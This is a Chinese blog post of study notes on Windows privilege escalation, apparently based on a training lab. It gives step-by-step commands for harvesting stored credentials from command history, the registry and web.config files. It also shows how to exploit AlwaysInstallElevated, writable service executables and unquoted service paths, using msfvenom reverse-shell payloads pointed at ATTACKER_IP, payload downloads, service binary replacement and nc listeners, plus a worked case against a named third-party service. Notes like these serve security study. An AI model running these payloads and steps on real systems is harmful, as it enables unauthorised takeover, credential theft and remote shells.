windows提权(1)

最新推荐文章于 2024-07-13 21:16:00 发布
最新推荐文章于 2024-07-13 21:16:00 发布
阅读量766 收藏 10
点赞数 9
文章标签: windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59357741/article/details/139581425
版权

信息收集:

systeminfo 查询系统信息

hostname 主机名

net user 查看用户信息

netstat -ano|find "3389" 查看服务pid号

wmic os get caption 查看系统名

wmic qfe get Description,HotFixID,InstalledOn 查看补丁信息
wmic product get name,version 查看当前安装程序

wmic service list brief 查询本机服务

wmic process list brief 查询本机进程

net share 查看本机共享列表

netsh firewall show config 查看防火墙配置

查看windows的历史命令

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

windows存储密码的地方:

C:/Windows/System32/config

保存的凭据:

cmdkey /list

虽然看不到密码,但是可猜测用户,用来暴力破解密码:

runas /savecred /user:admin cmd.exe

IIS配置,IIS是windows默认安装的web服务器,IIS 上的网站配置存储在调用的文件中,可以存储数据库或配置的身份验证机制的密码

C:\inetpub\wwwroot\web.config C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString 可以快速在文件上查找数据库连接字符串

从软件中提权:PUTTY

        PuTTY是Windows系统上常见的SSH客户端。用户不必每次都指定连接的参数,而是可以存储会话,其中可以存储 IP、用户和其他配置以供以后使用。虽然 PuTTY 不允许用户存储其 SSH 密码,但它将存储包含明文身份验证凭据的代理配置。

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s 在注册表项下搜索代理密码        

计划任务:

查看目标系统上的计划任务,您可能会看到计划任务丢失了其二进制文件,或者正在使用您可以修改的二进制文件。

schtasks /query /tn vulntask /fo list /v 要查看当前用户是否可以修改或覆盖“要运行的任务”可执行文件: icacls 文件

安装程序权限提升:

        Windows 安装程序文件(也称为.msi文件)用于在系统上安装应用程序。它们通常以启动它的用户的权限级别运行。但是,可以将这些配置为从任何用户帐户(甚至是非特权用户帐户)以更高的权限运行。这可能会允许我们生成以管理员权限运行的恶意 MSI 文件。

    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

     reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

        为了能够利用此漏洞,应同时设置这两个漏洞。否则,将无法进行开发。如果设置了这些, 则可以使用 生成恶意.msi文件,如下所示:

msfvenom msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.147.61 LPORT=LOCAL_PORT -f msi -o malicious.msi

        由于这是一个反向外壳,您还应该运行相应配置的 Metasploit 处理程序模块。 传输已创建的文件后,可以使用以下命令运行安装程序并接收反向 shell:

         msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Windows 服务由服务控制管理器 (SCM) 管理。

SCM 是一个负责根据需要管理服务状态、检查任何给定服务的当前状态以及通常提供配置服务的方法的过程。

Windows 计算机上的每个服务都有一个关联的可执行文件,每当启动服务时,SCM 都会运行该可执行文件。请务必注意,服务可执行文件实现特殊功能以便能够与 SCM 通信,因此无法将任何可执行文件作为服务成功启动。每个服务还指定将在其下运行服务的用户帐户。

sc qc apphostsvcaa

sc qc WindowsScheduler

我们可以看到,易受攻击的软件安装的服务以 svcuser1 的形式运行,并且与该服务关联的可执行文件在 .然后,我们继续检查可执行文件的权限:

C:\Progra~2\System~1\WService.exe icacls

C:\PROGRA~2\SYSTEM~1\WService.exe

在这里,我们有一些有趣的东西。“所有人”组对服务的可执行文件具有修改权限 (M)。这意味着我们可以简单地用我们偏好的任何有效负载覆盖它,服务将以配置的用户帐户的权限执行它。

让我们使用 msfvenom 生成一个 exe-service payload,并通过 python Web 服务器提供它:         wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe

         cd C:\PROGRA~2\SYSTEM~1\

        move WService.exe WService.exe.bkp

        move C:\Users\thm-unpriv\rev-svc.exe WService.exe

         icacls WService.exe /grant Everyone:F

        然后攻击机上启动nc或者mesfconsole

        sc stop windowsscheduler

        sc start windowsscheduler

正常情况下可能要等待服务重新启动

未带引号的服务路径(Unquoted Service Paths)

当我们无法像以前一样直接写入服务可执行文件时,可能仍然有机会通过使用相当模糊的功能强制服务运行任意可执行文件。

使用 Windows 服务时,当服务配置为指向“未引号”可执行文件时,会发生非常特殊的行为。通过不引号,我们的意思是关联可执行文件的路径没有正确引用以考虑命令上的空格。

SCM 不会像预期的那样失败,而是尝试帮助用户并开始按表中所示的顺序搜索每个二进制文件:

  1. 首先,搜索 .如果存在,服务将运行此可执行文件。

C:\\MyPrograms\\Disk.exe

  1. 如果后者不存在,它将搜索 .如果存在,服务将运行此可执行文件。

C:\\MyPrograms\\Disk Sorter.exe

  1. 如果后者不存在,它将搜索 .此选项预计会成功,并且通常会在默认安装中运行。

C:\\MyPrograms\\Disk Sorter Enterprise\\bin\\disksrs.exe

从这种行为中,问题变得很明显。如果攻击者创建在预期的服务可执行文件之前搜索的任何可执行文件,他们可以强制服务运行任意可执行文件。

可以列举出所有的路径中不含引号的:

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

icacls  c:\MyPrograms

该组具有 AD 和 WD 权限,允许用户分别创建子目录和文件。

        使用 msfvenom 创建 exe-service 有效负载并将其传输到目标主机的过程与以前相同,因此请随意创建以下有效负载并将其像以前一样上传到服务器。我们还将启动一个侦听器,以便在执行反向 shell 时接收它:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe

有效负载进入服务器后,将其移动到可能发生劫持的任何位置。在这种情况下,我们将有效负载移动到 我们还将授予每个人对文件的完全权限,以确保它可以由服务执行

         move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe

         icacls C:\MyPrograms\Disk.exe /grant Everyone:F

重新启动服务后,有效负载应执行:

sc stop "disk sorter enterprise"

sc start "disk sorter enterprise" (正常情况下,应该等待服务进行重启)

案例:

首先上传PowerUP

Invoke-AllChecks

请密切注意设置为 true 的“可以重新启动”选项。显示为未带引号的服务路径漏洞的服务的名称

msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

现在我们生成了一个名为 ASCService.exe 的反向 shell。

sc stop AdvancedSystemCareService9

copy ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

nc -lvnp 4443

sc start AdvancedSystemCareService9 `

然后就拥有了访问权限

claydemo
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
windows和linux常见的提权方法
Battery的博客
04-16 9万+
1.执行whoami /priv命令,查看当前用户是否拥有SeImpersonatePrivilege权限。2.如果拥有权限,使用Impersonate-User脚本提权。该脚本会创建一个新的进程,并使用当前用户的权限执行该进程。3.如果没有该权限,使用PowerUp脚本,该脚本会检测系统中是否存在可利用的漏洞,并提供相应的利用方法。
系统提权之:Windows 提权
f_carey的博客
11-04 1310
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
Windows提权方法简单总结
good good study
03-23 9712
提权是后渗透重要的一环节,在权限较低的情况下,我们在进行一些操作如读取/写入敏感文件、权限维持等会受到束缚,所以需要提权。 在实际中我们会碰到工作组和域环境,工作组环境我们提权的目的是从普通用户权限到管理员或者system权限。而域环境中我们通常是从域用户到域管理员权限。
Windows 提权
qq_53742230的博客
07-15 3602
Windows 一些提权手法总结
windows提权
qq_38675102的博客
12-31 2215
windwos提权自学笔记-保持更新
yyctf#study#windows提权1
07-25
nmap 扫描445端口是否开启net localgroup administrators xxxx /add(将用户设置为管理员权限)set target 1
windows账户提权 API.zip
01-22
总的来说,这个压缩包中的资源详细介绍了Windows环境下使用API进行账户提权的各种技术和策略,涵盖了从创建高权限进程到修改系统服务和注册表等多方面。这些技术在系统管理和软件开发中有其应用,但滥用可能会导致...
windows提权工具
01-15
可以对win2K3-win2012 server进行提权 win7也可以,win10没试过
windows&linux;提权总结
04-24
windows&linux;提权总结,套路,套路,套路,套路套路,套路,套路,。
windows7提权
04-26
Windows 7操作系统中,"提权...总结来说,Windows 7提权是一个涉及系统安全与便利性的过程。了解如何正确、安全提权,对于系统管理员和开发者来说至关重要。在实际操作中,要遵循最小权限原则,避免不必要的风险。
java 中钻石操作符 <> 的使用场景
qq_27390023的博客
07-10 407
钻石操作符在 Java 中的主要作用是简化泛型类型的实例化,减少代码冗余,使代码更加简洁和可读。它通过类型推断机制,让编译器自动推断出类型参数,而不需要程序员显式地重复类型参数。这样不仅减少了代码量,还减少了出错的可能性。
Java基础(十九):集合框架
最新发布
java开发
07-13 815
Set接口是Collection的子接口,Set接口相较于Collection接口没有提供额外的方法Set 集合不允许包含相同的元素,如果试把两个相同的元素加入同一个 Set 集合中,则添加操作失败Set集合支持的遍历方式和Collection集合一样:foreach和IteratorSet的常用实现类有:HashSet、TreeSet、LinkedHashSetHashSet 是 Set 接口的主要实现类,大多数时候使用 Set 集合时都使用这个实现类。
C/C++ list模拟
2301_77087344的博客
07-10 672
我们可以定义一个类,把节点_node封装起来,来弥补空间不连续的缺陷,能像vector那样一样来进行访问。template定义的模板参数只能供当前类或当前函数用而且我们可以在这个类里重载想要的东西使用时,我们就可以给每个类规范这个迭代器使用的名字,方便我们使用// 返回自己//返回节点自己//返回数据,数据类型为T= it._node;
Java集合框架的体系结构:深入探究与实践
哎 你看的博客
07-10 605
Java集合框架(Java Collections Framework)是Java语言中一个强大的工具集,用于处理对象集合。它提供了一套灵活的API,用于创建、操作和访问集合对象。集合框架不仅包括具体的集合类,如List、Set、Map等,还包括了集合操作的各种接口和算法。本文将深入探讨Java集合框架的层次结构和接口/类之间的关系,并提供丰富的代码示例。
PageDTO<T>,PageQuery,BeanUtils,CollUtils的封装
qq_30166465的博客
07-10 420
【代码】PageDTO<T>,BeanUtils,CollUtils的封装。
【线性表,线性表中的顺序表和链表】
Pumpkin_O的博客
07-10 2544
线性表是具有相同数据类型的n(n>0)个数据元素的有限序列。存在唯一的第一个元素;存在唯一的最后一个元素;除第一个元素外,每个元素均只有一个直接前驱;除最后一个元素外,每个元素均只有一个直接后继;【直接前驱】:指在该序列中位于其前面且紧邻的元素;【直接后继】:指在该序列中位于其后面且紧邻的元素。例如:在一个整数数组[1,5,8,10,49]中,元素8的直接前驱为5,直接后继为10。
C语言笔记31 •单链表经典算法OJ题-3.反转链表•
qq_64446190的博客
07-10 406
•单链表经典算法OJ题-3.反转链表•
javaweb图书商城系统带万字文档网上书城java项目java课程设计java毕业设计
weixin_43654123的博客
07-10 267
图书商城系统
泛型集合:Java中的类型安全与类型擦除
哎 你看的博客
07-10 1185
泛型是Java 5引入的一项重要特性,它为编译时类型安全提供了支持。在集合框架中,泛型发挥着至关重要的作用,允许开发者指定集合中元素的类型,从而避免了类型转换的错误和运行时异常。此外,Java中的类型擦除机制虽然解决了泛型与现有类的兼容性问题,但也带来了一些限制。本文将深入探讨泛型在集合中的使用,以及如何提供类型安全和消除类型擦除的需要。
windows 提权
08-27
Windows提权是指获取管理员权限或系统级权限的过程。在某些情况下,普通用户需要提升权限以执行某些操作或访问受限资源。 有几种常见的Windows提权方法,包括: 1. 利用已知漏洞:Windows系统中可能存在一些未修补...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

claydemo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值